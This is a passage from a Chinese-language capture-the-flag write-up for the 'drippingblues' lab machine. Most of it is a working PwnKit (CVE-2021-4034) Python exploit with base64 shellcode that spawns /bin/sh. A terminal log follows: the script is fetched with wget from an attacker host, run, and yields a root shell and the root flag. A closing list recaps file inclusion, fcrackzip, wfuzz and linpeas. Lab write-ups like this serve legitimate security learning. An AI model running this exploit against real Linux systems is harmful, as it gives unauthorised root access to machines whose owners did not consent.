AAAAAAABAAAABgAAAAAAAAAAAAAAMAEAAAAAAAAwAQAAAAAAAGAAAAAAAAAAAAAAAAAAAAAIAAAA
AAAAAAcAAAAAAAAAAAAAAAMAAAAAAAAAAAAAAJABAAAAAAAAkAEAAAAAAAACAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAAAAAAkgEAAAAAAAAFAAAAAAAAAJABAAAAAAAABgAAAAAA
AACQAQAAAAAAAAoAAAAAAAAAAAAAAAAAAAALAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAASDH/amlYDwVIuC9iaW4vc2gAmVBUX1JeajtYDwU=
'''
payload = base64.b64decode(payload_b64)

# Set the environment for the call to execve()
environ = [
        b'exploit',
        b'PATH=GCONV_PATH=.',
        b'LC_MESSAGES=en_US.UTF-8',
        b'XAUTHORITY=../LOL',
        None
]

# Find the C library to call execve() directly, as Python helpfully doesn't
# allow us to call execve() with no arguments.
try:
    libc = CDLL(find_library('c'))
except:
    print('[!] Unable to find the C library, wtf?')
    sys.exit()

# Create the shared library from the payload
print('[+] Creating shared library for exploit code.')
try:
    with open('payload.so', 'wb') as f:
        f.write(payload)
except:
    print('[!] Failed creating payload.so.')
    sys.exit()
os.chmod('payload.so', 0o0755)

# make the GCONV_PATH directory
try:
    os.mkdir('GCONV_PATH=.')
except FileExistsError:
    print('[-] GCONV_PATH=. directory already exists, continuing.')
except:
    print('[!] Failed making GCONV_PATH=. directory.')
    sys.exit()

# Create a temp exploit file
try:
    with open('GCONV_PATH=./exploit', 'wb') as f:
        f.write(b'')
except:
    print('[!] Failed creating exploit file')
    sys.exit()
os.chmod('GCONV_PATH=./exploit', 0o0755)

# Create directory to hold gconf-modules configuration file
try:
    os.mkdir('exploit')
except FileExistsError:
    print('[-] exploit directory already exists, continuing.')
except:
    print('[!] Failed making exploit directory.')
    sys.exit()

# Create gconf config file
try:
    with open('exploit/gconv-modules', 'wb') as f:
        f.write(b'module  UTF-8//    INTERNAL    ../payload    2\n');
except:
    print('[!] Failed to create gconf-modules config file.')
    sys.exit()

# Convert the environment to an array of char*
environ_p = (c_char_p * len(environ))()
environ_p[:] = environ

print('[+] Calling execve()')
# Call execve() with NULL arguments
libc.execve(b'/usr/bin/pkexec', c_char_p(None), environ_p)

执行后成功提权

thugger@drippingblues:~$ wget http://192.168.11.130:8888/CVE-2021-4034.py
--2024-04-03 07:07:43--  http://192.168.11.130:8888/CVE-2021-4034.py
Connecting to 192.168.11.130:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3262 (3,2K) [text/x-python]
Saving to: ‘CVE-2021-4034.py’

CVE-2021-4034.py                   100%[==============================================================>]   3,19K  --.-KB/s    in 0s      

2024-04-03 07:07:43 (304 MB/s) - ‘CVE-2021-4034.py’ saved [3262/3262]

thugger@drippingblues:~$ python CVE-2021-4034.py 

Command 'python' not found, did you mean:

  command 'python3' from deb python3
  command 'python' from deb python-is-python3

thugger@drippingblues:~$ python3 CVE-2021-4034.py 
[+] Creating shared library for exploit code.
[+] Calling execve()
# whoami
root
# pwd
/home/thugger
# id
uid=0(root) gid=1001(thugger) groups=1001(thugger)
# cd /root	
# ls
root.txt
# cat root
cat: root: No such file or directory
# cat root.txt
78CE377EF7F10FF0EDCA63DD60EE63B8#

成功拿到flag2

这里看了其他人的wp,发现是利用的CVE-2021-3560这个漏洞,我这边跑linpeas没有发现这个

回头看看secret.zip没有解出来,利用此前出现过的用户名、md5值都试了都不对,可能就是需要爆破吧

三、总结

这个靶机又一次利用了文件包含漏洞,这里在没有特别明显的提示的时候,通常可以利用fuzz工具做模糊测试,来寻找文件包含的parameters

  1. FTP匿名访问
  2. fcrackzip的使用
  3. 文件包含漏洞
  4. wfuzz的利用
  5. suid3num.pylinpeas的使用
posted @ 2024-04-06 20:00  hirak0  阅读(29)  评论(0编辑  收藏  举报